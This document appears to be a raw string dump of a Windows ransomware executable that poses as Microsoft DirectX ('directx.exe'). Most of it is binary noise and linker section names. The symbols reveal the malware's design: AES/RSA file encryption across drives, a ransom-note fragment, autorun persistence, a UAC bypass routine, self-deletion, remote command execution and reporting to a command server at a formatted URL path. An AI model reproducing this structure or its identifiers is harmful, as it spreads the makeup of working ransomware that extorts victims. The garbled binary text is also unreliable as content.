!This program cannot be run in DOS mode.
6E~y>K\
p<t@x'
T\@`DT.
KdHhLly
8@~7%Z
/pnxx)
$'`0!Z
:K ^<S
Tz% *M3
th}Jd~
w5pN7'p
vEs-
5\r$ '(
gH.8 `
@>  D0
iml,",4
kO,<FF
domains
.phpAPI#-m
http:/
/%s/ld/?id=
nternetShortcut]
oBfile/bu
Microsoft Enhanced Cry
ptograph P<vider v1.0^u
62345678901
h.RADAMANT
IsWow64
S|ware\
sion\Run
Di"ctX
^ho 2f
ill /f
02.192
HTTP/12
-T0e: appl
-form-
da"gth
 IP Addr
kTok^Memb<
aJ "cmd&2
Tfix e
rv=m.i
UKZBY8:
*notH"5f[px
'r6vdy,
"OK".W
LOUR_FILES. 
_srS-LIBGCCWv
SJLJ-GTHR-
kR(t__SHARED)V:%
.BGetA
G 8L`<
<$,4<H
CloseH
YModu\e
upInfo
S6tnb$sA
'UnhEd
Acqux+;
yEnxpo
;DL Vv
=#l~W
DnsU_A
d"Qs_ap"t
=s?s=D
mppylen
necvh.tbya
XPTPSW
KERNEL32.DLL
ADVAPI32.DLL
DNSAPI.DLL
msvcrt.dll
SHELL32.DLL
USER32.dll
WS2_32.DLL
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualAlloc
VirtualFree
ExitProcess
FreeSid
DnsQuery_A
ShellExecuteA
wsprintfA
crt1.c
_atexit
__onexitp
crtstuff.c
main.cpp
.rdata
aes.cpp
.rdata
md5.cpp
_PADDING`
.idata$7
.idata$5
.idata$4
.idata$6p
.idata$7
.idata$5
.idata$4
.idata$6
fthunk
.idata$2
.idata$5
.idata$4
.idata$4
.idata$5
.idata$7
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
fthunk
.idata$2(
.idata$5
.idata$4
.idata$4 
.idata$5
.idata$7
.idata$7T
.idata$5
.idata$4
.idata$6l
.idata$7d
.idata$5
.idata$4
.idata$6
.idata$7`
.idata$5
.idata$4
.idata$6
.idata$7h
.idata$5
.idata$4
.idata$6
.idata$7\
.idata$5
.idata$4
.idata$6
.idata$7X
.idata$5
.idata$4
.idata$6
.idata$7p
.idata$5
.idata$4
.idata$6
.idata$7x
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6\
.idata$7t
.idata$5
.idata$4
.idata$6
.idata$7|
.idata$5
.idata$4
.idata$6$
.idata$7
.idata$5
.idata$4
.idata$68
.idata$7
.idata$5
.idata$4
.idata$6H
.idata$7P
.idata$5|
.idata$4
.idata$6P
.idata$7l
.idata$5
.idata$4
.idata$6
fthunk
.idata$2
.idata$5x
.idata$4
.idata$4
.idata$5
.idata$7
CRTglob.c
CRTfmode.c
txtmode.c
main.c
pseudo-reloc.c
CRT_fp10.c
_fpreset
gccmain.c
___main
.rdata
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6|
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6\
.idata$7
.idata$5
.idata$4(
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6l
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7|
.idata$5
.idata$4
.idata$6L
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5$
.idata$4L
.idata$6
.idata$7
.idata$5
.idata$40
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6T
.idata$7
.idata$5
.idata$4@
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$44
.idata$6
.idata$7
.idata$5 
.idata$4H
.idata$6
.idata$7
.idata$5
.idata$48
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6`
.idata$7
.idata$5
.idata$4$
.idata$6
.idata$7
.idata$5
.idata$4
.idata$64
.idata$7
.idata$5
.idata$4<
.idata$6
.idata$7
.idata$5
.idata$4,
.idata$6
.idata$7
.idata$5
.idata$4D
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6,
.idata$7
.idata$5
.idata$4
.idata$6$
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6H
.idata$7
.idata$5
.idata$4
.idata$6<
.idata$7
.idata$5
.idata$4
.idata$6l
.idata$7
.idata$5
.idata$4 
.idata$6x
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4
.idata$6
fthunk
.idata$2P
.idata$5
.idata$4
.idata$4P
.idata$5(
.idata$7
.idata$74
.idata$5@
.idata$4h
.idata$6 
.idata$78
.idata$5D
.idata$4l
.idata$64
.idata$7<
.idata$5H
.idata$4p
.idata$6D
fthunk
.idata$2x
.idata$5<
.idata$4d
.idata$4t
.idata$5L
.idata$7@
.idata$7X
.idata$5t
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4<
.idata$6T
.idata$7 
.idata$5<
.idata$4d
.idata$6
.idata$7\
.idata$5x
.idata$4
.idata$6
.idata$7T
.idata$5p
.idata$4
.idata$6
.idata$7L
.idata$5h
.idata$4
.idata$6
.idata$7
.idata$5
.idata$4,
.idata$6
.idata$7@
.idata$5\
.idata$4
.idata$6
.idata$7
.idata$5 
.idata$4H
.idata$6|
.idata$7
.idata$5$
.idata$4L
.idata$6
.idata$7
.idata$5
.idata$4D
.idata$6p
.idata$7h
.idata$5
.idata$4
.idata$6@
.idata$7
.idata$58
.idata$4`
.idata$6
.idata$7$
.idata$5@
.idata$4h
.idata$6
.idata$7
.idata$5
.idata$44
.idata$64
.idata$7<
.idata$5X
.idata$4
.idata$6
.idata$7,
.idata$5H
.idata$4p
.idata$68
.idata$70
.idata$5L
.idata$4t
.idata$6L
.idata$7
.idata$54
.idata$4\
.idata$6
.idata$7
.idata$50
.idata$4X
.idata$6
.idata$78
.idata$5T
.idata$4|
.idata$6t
.idata$7(
.idata$5D
.idata$4l
.idata$6 
.idata$7d
.idata$5
.idata$4
.idata$64
.idata$7D
.idata$5`
.idata$4
.idata$6
.idata$7H
.idata$5d
.idata$4
.idata$6
.idata$7
.idata$5
.idata$48
.idata$6D
.idata$7P
.idata$5l
.idata$4
.idata$6
.idata$7`
.idata$5|
.idata$4
.idata$6$
.idata$7
.idata$5
.idata$40
.idata$6(
.idata$7
.idata$5,
.idata$4T
.idata$6
.idata$74
.idata$5P
.idata$4x
.idata$6`
.idata$7
.idata$5(
.idata$4P
.idata$6
.idata$7
.idata$5
.idata$4@
.idata$6d
.idata$7
.idata$5
.idata$4(
.idata$6
fthunk
.idata$2<
.idata$5
.idata$4$
.idata$4
.idata$5
.idata$7l
.idata$7 
.idata$50
.idata$4X
.idata$6
.idata$7$
.idata$54
.idata$4\
.idata$6
fthunk
.idata$2d
.idata$5,
.idata$4T
.idata$4`
.idata$58
.idata$7(
crtstuff.c
.ctors
__cexit
_domains
_sprintf
_strcat
_strcmp
_recv@16
_S_Build
_srand
__dll__
_fwrite
_memcpy
_masks
_memset
__argc
_remove
_fflush
_send@16
_fprintfP
__alloca
__argv
_fread
_fopen
__fmode
_MY_HASH
__end__
_fgetc
_signal
_malloc
_fclose
_strcpy
_sscanf
_fseek
_abort
_ftell
_htons@4`
_domain
_strlen
_printf
_Sleep@4
_strstr
__gnu_exception_handler@4
___mingw_CRTStartup
_mainCRTStartup
_WinMainCRTStartup
___do_sjlj_init
__Z14decrypt_domainPc
__Z15generateRSAkeysPhPmS_S0_
__Z11encrypt_RSAPhmPcPm
__Z11decrypt_RSAPhmPcPm
__Z14genereteAESkeyPh
__Z11encryptFilePcS_Phm
__Z11decryptFilePcS_Phm
__Z9my_strcmpPcS_
__Z9checkMaskPc
__Z17checkMaskRADAMANTPc
__Z14encryptFileAESPcS_Phm
__Z14decryptFileAESPcS_Phm
__Z11try_to_editPcS_
__Z6SearchPciPhm
__Z8GetCSizePcPi
__Z20GetEncryptedFileSizePi
__Z26try_to_create_file_on_diskPc
__Z17FindAndCryprFilesPhm
__Z19FindAndDecryprFilesPhm
__Z6getMD5PcS_
__Z8getDiscsPc
__Z17getWindowsVersionPc
__Z11GetProcBitsPc
__Z5getIDPc
__Z7SetARunv
__Z7DelARunv
__Z9checkARunv
__Z10setDomainsPc
__Z17getDomainsFromRegv
__Z7DelSelfv
__Z8GetBitIPPc
__Z16SendDataToServerPcS_S_mS_
__Z5GetIPPcS_S_
__Z18CreateFileOnDskTopPcS_
__Z19IsUserElevatedAdminv
__Z14getBuildNumberv
__Z5UACMEv
__Z9getmyHASHPc
.text$feof
__Z8DownloadPc
__Z9update_mev
__Z10SendMyInfov
__Z10encrypt_PCPc
__Z10decrypt_PCPc
__Z11copyMeToWinv
__Z13check_my_pathv
__Z12exec_commandPc
__Z6doworkPv
_WinMain@16
__Z14aes_gen_tablesv
_ZZ11aes_set_keyE7ft_init
_ZZ11aes_set_keyE7kt_init
_aes_set_key
_aes_encrypt
_aes_decrypt
_aes_cbc_encrypt
_aes_cbc_decrypt
_aes_self_test
__aes_src
__ZN3MD57MD5InitEP7MD5_CTX
__ZN3MD59MD5UpdateEP7MD5_CTXPhj
__ZN3MD58MD5FinalEPhP7MD5_CTX
__ZN3MD56DecodeEPmPhj
__ZN3MD510MD5_memsetEPhij
__ZN3MD56EncodeEPhPmj
__ZN3MD512MD5TransformEPmPh
__ZN3MD510MD5_memcpyEPhS0_j
__pei386_runtime_relocator
__fpreset
_initialized
___do_global_dtors
___do_global_ctors
pseudo-reloc-list.c
_w32_atom_suffix
___w32_sharedptr_default_unexpected
___w32_sharedptr_get
dw2_object_mutex.0
dw2_once.1
sjl_fc_key.2
sjl_once.3
___w32_sharedptr_initialize
___eprintf
___sjlj_init_ctor
__imp__FindFirstFileA@8
_GetSystemInfo@4
__imp__GetVersion@0
___RUNTIME_PSEUDO_RELOC_LIST__
_FindFirstFileA@8
__imp___setmode
_GetCurrentHwProfileA@4
__imp__CloseHandle@4
__data_start__
___DTOR_LIST__
__imp___beginthread
__imp__LocalFree@4
_FilesSize
__imp__recv@16
__imp___onexit
___p__fmode
__imp__GetLastError@0
_SetUnhandledExceptionFilter@4
___w32_sharedptr_terminate
_CreateMutexA@12
__imp__FindNextFileA@8
_GetModuleFileNameA@12
___tls_start__
__imp__CreateFileA@28
_CryptGenKey@16
__libmsvcrt_a_iname
__imp__FindAtomA@4
__imp__abort
__size_of_stack_commit__
__imp__WinExec@8
__size_of_stack_reserve__
__major_subsystem_version__
___crt_xl_start__
_AddAtomA@4
_wsprintfA
___crt_xi_start__
___chkstk
___crt_xi_end__
_ShellExecuteA@24
_VirtualAlloc@16
__imp__OpenFile@12
__imp__rand
_DnsQuery_A@24
_GetLastError@0
__imp____p__environ
_CryptExportKey@24
__imp__RegSetValueExA@24
__head_libuser32_a
__imp__DnsRecordListFree@8
__imp___iob
__imp__SetFileAttributesA@8
_GetModuleHandleA@4
__imp__strstr
__libadvapi32_a_iname
_S_Landing
__imp__LocalAlloc@8
__imp__CopyFileA@12
__imp__wsprintfA
__bss_start__
__head_libws2_32_a
_CryptEncrypt@28
___RUNTIME_PSEUDO_RELOC_LIST_END__
__size_of_heap_commit__
__imp__RegCloseKey@4
_MessageBoxA@16
__imp__GetCurrentProcess@0
__imp__srand
___p__environ
__imp__GetProcAddress@8
_GetProcAddress@8
___crt_xp_start__
_GetCommandLineA@0
_fl_showform
__imp__RegOpenKeyExA@20
___crt_xp_end__
__imp__signal
__minor_os_version__
__imp__CreateMutexA@12
_GetComputerNameA@8
__imp__atexit
__head_libmsvcrt_a
__image_base__
__head_libshell32_a
_DnsRecordListFree@8
__imp__exit
__section_alignment__
_GetLogicalDrives@0
_socket@12
__imp__fseek
__imp__GetStartupInfoA@4
__imp__GetLogicalDrives@0
__RUNTIME_PSEUDO_RELOC_LIST__
__imp__htons@4
__imp__GetKeyboardType@4
__imp____p__fmode
_CopyFileA@12
__libdnsapi_a_iname
_ExitProcess@4
__imp__inet_ntoa@4
_gethostbyname@4
__data_end__
___getmainargs
_FindClose@4
___w32_sharedptr
__CTOR_LIST__
___set_app_type
_CryptAcquireContextA@20
__imp__sprintf
__bss_end__
__CRT_fmode
_domain_list
___crt_xc_end__
__imp__CryptExportKey@24
___crt_xc_start__
__imp__socket@12
__imp__closesocket@4
___CTOR_LIST__
__imp___lopen@8
__imp__GetSystemInfo@4
_CreateFileA@28
__head_libadvapi32_a
_inet_ntoa@4
__imp__GetAtomNameA@12
__imp__MessageBoxA@16
_AllocateAndInitializeSid@44
_GetStartupInfoA@4
_WSAStartup@8
_SetFileAttributesA@8
__imp__fread
__imp__CryptAcquireContextA@20
__imp__memcpy
__imp__GetFileSize@8
__imp__fgetc
_dom_count
_FindNextFileA@8
__imp__strcmp
__imp__inet_addr@4
__file_alignment__
_SHGetFolderPathA@20
__imp__GetCurrentHwProfileA@4
__imp__time
__imp__CryptDecrypt@24
__imp__malloc
__imp__CryptGenKey@16
__imp__RegCreateKeyExA@36
__major_os_version__
_ReleaseMutex@4
_RegSetValueExA@24
__imp__DnsQuery_A@24
_CloseHandle@4
__imp__gethostbyname@4
_LocalFree@4
__imp__CryptEncrypt@28
_RegOpenKeyExA@20
__imp__GetModuleHandleA@4
__DTOR_LIST__
__imp__fprintf
__imp__memset
__imp__fclose
__imp__RegDeleteValueA@8
__size_of_heap_reserve__
___crt_xt_start__
__subsystem__
_GetVersion@0
__imp__strlen
__lopen@8
__imp__fflush
_RegDeleteValueA@8
__imp__strcpy
_FreeSid@4
__imp__AllocateAndInitializeSid@44
_WinExec@8
__imp__RegQueryValueExA@24
_cur_domain
___w32_sharedptr_unexpected
__imp__ShellExecuteA@24
__imp__fopen
__imp____getmainargs
__imp__remove
__imp__SHGetFolderPathA@20
___tls_end__
_RegCreateKeyExA@36
__imp__ExitProcess@4
_OpenFile@12
_GetCurrentProcess@0
__imp__send@16
__beginthread
__imp__free
__imp__SetUnhandledExceptionFilter@4
__major_image_version__
__imp__GetWindowsDirectoryA@8
_RegQueryValueExA@24
__loader_flags__
_CryptDecrypt@24
__libuser32_a_iname
_GetWindowsDirectoryA@8
__CRT_glob
__setmode
__imp__printf
__imp__CryptImportKey@24
__imp__ftell
__imp__AddAtomA@4
_inet_addr@4
__imp__FreeSid@4
_S_Shtrcut
__head_libkernel32_a
__imp___cexit
__minor_subsystem_version__
__imp__FindClose@4
__minor_image_version__
__imp__Sleep@4
_closesocket@4
__imp____set_app_type
_GetKeyboardType@4
__imp__GetComputerNameA@8
_FindAtomA@4
__imp__WSAStartup@8
__imp__GetCommandLineA@0
_GetFileSize@8
__imp__sscanf
_RegCloseKey@4
__libshell32_a_iname
_GetAtomNameA@12
__RUNTIME_PSEUDO_RELOC_LIST_END__
_CryptImportKey@24
__libkernel32_a_iname
__imp__ReleaseMutex@4
__imp__GetModuleFileNameA@12
_connect@12
_LocalAlloc@8
__imp__connect@12
__head_libdnsapi_a
___crt_xt_end__
__libws2_32_a_iname
__imp__VirtualAlloc@16
__imp__strcat
__imp__fwrite
VS_VERSION_INFO
StringFileInfo
040904E4
CompanyName
Microsoft Corporation
FileVersion
FileDescription
Microsoft
 DirectX x86
InternalName
LegalCopyright
Microsoft Corporation
LegalTrademarks
Microsoft Corporation
OriginalFilename
directx.exe
ProductName
DirectX
ProductVersion
VarFileInfo
Translation
